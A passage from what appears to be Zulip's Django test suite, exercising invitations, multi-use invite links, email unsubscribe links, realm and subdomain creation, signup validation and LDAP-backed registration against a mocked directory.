def test_invite_outside_domain_in_closed_realm(self):
# type: () -> None
"""
In a realm with `restricted_to_domain = True`, you can't invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = True
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.")
def test_invite_outside_domain_in_open_realm(self):
# type: () -> None
"""
In a realm with `restricted_to_domain = False`, you can invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = False
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
def test_invite_outside_domain_before_closing(self):
# type: () -> None
"""
If you invite someone with a different domain from that of the realm
when `restricted_to_domain = False`, but `restricted_to_domain` later
changes to true, the invitation should succeed but the invitee's signup
attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.restricted_to_domain = False
zulip_realm.save()
self.login(self.example_email("hamlet"))
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.restricted_to_domain = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@example.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("only allows users with e-mail", result)
def test_invite_with_non_ascii_streams(self):
# type: () -> None
"""
Inviting someone to streams with non-ASCII characters succeeds.
"""
self.login(self.example_email("hamlet"))
invitee = "alice-test@zulip.com"
stream_name = u"hümbüǵ"
# Make sure we're subscribed before inviting someone.
self.subscribe(self.example_user("hamlet"), stream_name)
self.assert_json_success(self.invite(invitee, [stream_name]))
def test_invitation_reminder_email(self):
# type: () -> None
from django.core.mail import outbox
# All users belong to zulip realm
referrer_user = 'hamlet'
current_user_email = self.example_email(referrer_user)
self.login(current_user_email)
invitee_email = self.nonreg_email('alice')
self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee_email))
self.check_sent_emails([invitee_email])
data = {"email": invitee_email, "referrer_email": current_user_email}
invitee = get_prereg_user_by_email(data["email"])
referrer = self.example_user(referrer_user)
link = create_confirmation_link(invitee, referrer.realm.host, Confirmation.INVITATION)
context = common_context(referrer)
context.update({
'activate_url': link,
'referrer_name': referrer.full_name,
'referrer_email': referrer.email,
'referrer_realm_name': referrer.realm.name,
})
with self.settings(EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'):
send_future_email(
"zerver/emails/invitation_reminder", to_email=data["email"],
from_address=FromAddress.NOREPLY, context=context)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now())
self.assertEqual(len(email_jobs_to_deliver), 1)
email_count = len(outbox)
for job in email_jobs_to_deliver:
send_email(**ujson.loads(job.data))
self.assertEqual(len(outbox), email_count + 1)
self.assertIn(FromAddress.NOREPLY, outbox[-1].from_email)
# Now verify that signing up clears invite_reminder emails
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 1)
self.register(invitee_email, "test")
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(len(email_jobs_to_deliver), 0)
class InviteeEmailsParserTests(TestCase):
def setUp(self):
# type: () -> None
self.email1 = "email1@zulip.com"
self.email2 = "email2@zulip.com"
self.email3 = "email3@zulip.com"
def test_if_emails_separated_by_commas_are_parsed_and_striped_correctly(self):
# type: () -> None
emails_raw = "{} ,{}, {}".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_separated_by_newlines_are_parsed_and_striped_correctly(self):
# type: () -> None
emails_raw = "{}\n {}\n {} ".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self):
# type: () -> None
emails_raw = "Email One <{}>\nEmailTwo<{}>\nEmail Three<{}>".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_in_mixed_style_are_parsed_correctly(self):
# type: () -> None
emails_raw = "Email One <{}>,EmailTwo<{}>\n{}".format(self.email1, self.email2, self.email3)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
class MultiuseInviteTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.realm = get_realm('zulip')
self.realm.invite_required = True
self.realm.save()
def generate_multiuse_invite_link(self, streams=None, date_sent=None):
# type: (List[Stream], Optional[datetime.datetime]) -> Text
invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
invite.save()
if streams is not None:
invite.streams = streams
invite.save()
if date_sent is None:
date_sent = timezone_now()
key = generate_key()
Confirmation.objects.create(content_object=invite, date_sent=date_sent,
confirmation_key=key, type=Confirmation.MULTIUSE_INVITE)
return confirmation_url(key, self.realm.host, Confirmation.MULTIUSE_INVITE)
def check_user_able_to_register(self, email, invite_link):
# type: (Text, Text) -> None
password = "password"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
from django.core.mail import outbox
outbox.pop()
def check_user_subscribed_only_to_streams(self, user_name, streams):
# type: (str, List[Stream]) -> None
sorted(streams, key=lambda x: x.name)
subscribed_streams = gather_subscriptions(self.nonreg_user(user_name))[0]
self.assertEqual(len(subscribed_streams), len(streams))
for x, y in zip(subscribed_streams, streams):
self.assertEqual(x["name"], y.name)
def test_valid_multiuse_link(self):
# type: () -> None
email1 = self.nonreg_email("test")
email2 = self.nonreg_email("test1")
email3 = self.nonreg_email("alice")
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS - 1)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
self.check_user_able_to_register(email1, invite_link)
self.check_user_able_to_register(email2, invite_link)
self.check_user_able_to_register(email3, invite_link)
def test_expired_multiuse_link(self):
# type: () -> None
email = self.nonreg_email('newuser')
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link has expired.", result)
def test_invalid_multiuse_link(self):
# type: () -> None
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link is malformed.", result)
def test_invalid_multiuse_link_in_open_realm(self):
# type: () -> None
self.realm.invite_required = False
self.realm.save()
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
with patch('zerver.views.registration.get_realm_from_request', return_value=self.realm):
with patch('zerver.views.registration.get_realm', return_value=self.realm):
self.check_user_able_to_register(email, invite_link)
def test_multiuse_link_with_specified_streams(self):
# type: () -> None
name1 = "newuser"
name2 = "bob"
email1 = self.nonreg_email(name1)
email2 = self.nonreg_email(name2)
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email1, invite_link)
self.check_user_subscribed_only_to_streams(name1, streams)
stream_names = ["Rome", "Verona"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email2, invite_link)
self.check_user_subscribed_only_to_streams(name2, streams)
class EmailUnsubscribeTests(ZulipTestCase):
def test_error_unsubscribe(self):
# type: () -> None
# An invalid unsubscribe token "test123" produces an error.
result = self.client_get('/accounts/unsubscribe/missed_messages/test123')
self.assert_in_response('Unknown email unsubscribe request', result)
# An unknown message type "fake" produces an error.
user_profile = self.example_user('hamlet')
unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assert_in_response('Unknown email unsubscribe request', result)
def test_missedmessage_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in missed message
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user('hamlet')
user_profile.enable_offline_email_notifications = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile,
"missed_messages")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_offline_email_notifications)
def test_welcome_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in welcome e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user('hamlet')
# Simulate a new user signing up, which enqueues 2 welcome e-mails.
enqueue_welcome_emails(user_profile)
self.assertEqual(2, ScheduledEmail.objects.filter(user=user_profile).count())
# Simulate unsubscribing from the welcome e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The welcome email jobs are no longer scheduled.
self.assertEqual(result.status_code, 200)
self.assertEqual(0, ScheduledEmail.objects.filter(user=user_profile).count())
def test_digest_unsubscribe(self):
# type: () -> None
"""
We provide one-click unsubscribe links in digest e-mails that you can
click even when logged out to stop receiving them.
Unsubscribing from these emails also dequeues any digest email jobs that
have been queued.
"""
user_profile = self.example_user('hamlet')
self.assertTrue(user_profile.enable_digest_emails)
# Enqueue a fake digest email.
context = {'name': '', 'realm_uri': '', 'unread_pms': [], 'hot_conversations': [],
'new_users': [], 'new_streams': {'plain': []}, 'unsubscribe_link': ''}
send_future_email('zerver/emails/digest', to_user_id=user_profile.id, context=context)
self.assertEqual(1, ScheduledEmail.objects.filter(user=user_profile).count())
# Simulate unsubscribing from digest e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The setting is toggled off, and scheduled jobs have been removed.
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_digest_emails)
self.assertEqual(0, ScheduledEmail.objects.filter(user=user_profile).count())
class RealmCreationTest(ZulipTestCase):
def test_create_realm(self):
# type: () -> None
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm = get_realm('test')
# Make sure the realm does not exist
self.assertIsNone(realm)
with self.settings(OPEN_REALM_CREATION=True):
# Create new realm with the email
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertIsNotNone(realm)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
# Check defaults
self.assertEqual(realm.org_type, Realm.CORPORATE)
self.assertEqual(realm.restricted_to_domain, False)
self.assertEqual(realm.invite_required, True)
self.assertTrue(result["Location"].endswith("/"))
# Check welcome messages
for stream_name, text, message_count in [
('announce', 'This is', 1),
('core team', 'This is', 1),
('general', 'Welcome to', 1),
('new members', 'stream is', 1),
('zulip', 'Here is', 3)]:
stream = get_stream(stream_name, realm)
recipient = get_recipient(Recipient.STREAM, stream.id)
messages = Message.objects.filter(recipient=recipient).order_by('pub_date')
self.assertEqual(len(messages), message_count)
self.assertIn(text, messages[0].content)
def test_create_realm_existing_email(self):
# type: () -> None
"""
Trying to create a realm with an existing email should just redirect to
a login page.
"""
with self.settings(OPEN_REALM_CREATION=True):
email = self.example_email("hamlet")
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
def test_create_realm_no_creation_key(self):
# type: () -> None
"""
Trying to create a realm without a creation_key should fail when
OPEN_REALM_CREATION is false.
"""
email = "user1@test.com"
realm = get_realm('test')
# Make sure the realm does not exist
self.assertIsNone(realm)
with self.settings(OPEN_REALM_CREATION=False):
# Create new realm with the email, but no creation key.
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response('New organization creation disabled.', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self):
# type: () -> None
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
# Make sure the realm does not exist
self.assertIsNone(get_realm('test'))
# Create new realm with the email
result = self.client_post('/create_realm/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name=realm_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=string_id + ".testserver")
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertIsNotNone(realm)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self):
# type: () -> None
result = self.client_post('/create_realm/', {'email': "hi@mailinator.com"})
self.assert_in_response('Please use your real email address.', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
errors = {'id': "length 3 or greater",
'-id': "cannot start or end with a",
'string-ID': "lowercase letters",
'string_id': "lowercase letters",
'stream': "unavailable",
'streams': "unavailable",
'about': "unavailable",
'abouts': "unavailable",
'zephyr': "unavailable"}
for string_id, error_msg in errors.items():
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name = realm_name)
self.assert_in_response(error_msg, result)
# test valid subdomain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'a-0',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://a-0.testserver/accounts/login/subdomain/')
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://testserver/accounts/login/subdomain/')
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain_option(self):
# type: () -> None
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/create_realm/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://testserver/accounts/login/subdomain/')
def test_is_root_domain_available(self):
# type: () -> None
self.assertTrue(is_root_domain_available())
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
self.assertFalse(is_root_domain_available())
realm = get_realm("zulip")
realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
realm.save()
self.assertFalse(is_root_domain_available())
class UserSignUpTest(ZulipTestCase):
def _assert_redirected_to(self, result, url):
# type: (HttpResponse, Text) -> None
self.assertEqual(result.status_code, 302)
self.assertEqual(result['LOCATION'], url)
def test_bad_email_configuration_for_accounts_home(self):
# type: () -> None
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
'zerver.views.registration.send_registration_completion_email',
side_effect=smtplib.SMTPException('uh oh')
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/accounts/home/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0][0],
'Error in accounts_home: uh oh'
)
def test_bad_email_configuration_for_create_realm(self):
# type: () -> None
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
'zerver.views.registration.send_registration_completion_email',
side_effect=smtplib.SMTPException('uh oh')
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/create_realm/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0][0],
'Error in create_realm: uh oh'
)
def test_user_default_language_and_timezone(self):
# type: () -> None
"""
Check if the default language of a new user is the default language
of the realm.
"""
email = self.nonreg_email('newguy')
password = "newpassword"
timezone = "US/Mountain"
realm = get_realm('zulip')
do_set_realm_property(realm, 'default_language', u"de")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, timezone=timezone)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newguy')
self.assertEqual(user_profile.default_language, realm.default_language)
self.assertEqual(user_profile.timezone, timezone)
from django.core.mail import outbox
outbox.pop()
def test_signup_already_active(self):
# type: () -> None
"""
Check if signing up with an active email redirects to a login page.
"""
email = self.example_email("hamlet")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
result = self.client_get(result.url)
self.assert_in_response("You've already registered", result)
def test_signup_invalid_name(self):
# type: () -> None
"""
Check if an invalid name during signup is handled properly.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
self.assert_in_success_response(["Invalid characters in name!"], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_without_password(self):
# type: () -> None
"""
Check if signing up without a password works properly when
password_auth_enabled is False.
"""
email = self.nonreg_email('newuser')
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with patch('zerver.views.registration.password_auth_enabled', return_value=False):
result = self.client_post(
'/accounts/register/',
{'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
# User should now be logged in.
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newuser')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_signup_without_full_name(self):
# type: () -> None
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'from_confirmation': '1'})
self.assert_in_success_response(["You're almost there."], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_with_full_name(self):
# type: () -> None
"""
        Check if signing up with a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'full_name': "New Guy",
'from_confirmation': '1'})
self.assert_in_success_response(["You're almost there."], result)
def test_signup_invalid_subdomain(self):
# type: () -> None
"""
Check if attempting to authenticate to the wrong subdomain logs an
error and redirects.
"""
email = "newuser@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
def invalid_subdomain(**kwargs):
# type: (**Any) -> Any
return_data = kwargs.get('return_data', {})
return_data['invalid_subdomain'] = True
with patch('zerver.views.registration.authenticate', side_effect=invalid_subdomain):
with patch('logging.error') as mock_error:
result = self.client_post(
'/accounts/register/',
{'password': password,
'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
mock_error.assert_called_once()
self.assertEqual(result.status_code, 302)
def test_failed_signup_due_to_restricted_domain(self):
# type: () -> None
realm = get_realm('zulip')
realm.invite_required = False
realm.save()
request = HostRequestMock(host = realm.host)
request.session = {} # type: ignore
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Your email address, {}, is not in one of the domains".format(email),
form.errors['email'][0])
def test_failed_signup_due_to_invite_required(self):
# type: () -> None
realm = get_realm('zulip')
realm.invite_required = True
realm.save()
request = HostRequestMock(host = realm.host)
request.session = {} # type: ignore
email = 'user@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Please request an invite for {} from".format(email),
form.errors['email'][0])
def test_failed_signup_due_to_nonexistent_realm(self):
# type: () -> None
request = HostRequestMock(host = 'acme.' + settings.EXTERNAL_HOST)
request.session = {} # type: ignore
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=None)
self.assertIn("organization you are trying to join using {} does "
"not exist".format(email), form.errors['email'][0])
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_from_confirmation(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New LDAP fullname']
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"New LDAP fullname",
"newuser@zulip.com"],
result)
# Verify that the user is asked for name
self.assert_in_success_response(['id_full_name'], result)
# TODO: Ideally, we wouldn't ask for a password if LDAP is
        # enabled, in which case this assert should be inverted.
self.assert_in_success_response(['id_password'], result)
# Test the TypeError exception handler
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': None # This will raise TypeError
}
}
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"newuser@zulip.com"],
result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_end_to_end(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
full_name = 'New LDAP fullname'
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': [full_name],
'sn': ['shortname'],
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
# Click confirmation link
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Full name should be set from LDAP
self.assert_in_success_response(["You're almost there.",
full_name,
"newuser@zulip.com"],
result)
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(email,
'wrongpassword',
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Didn't create an account
with self.assertRaises(UserProfile.DoesNotExist):
user_profile = UserProfile.objects.get(email=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(email,
password,
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auto_registration_on_login(self):
# type: () -> None
"""The most common way for LDAP authentication to be used is with a
server that doesn't have a terms-of-service required, in which
case we offer a complete single-sign-on experience (where the
user just enters their LDAP username and password, and their
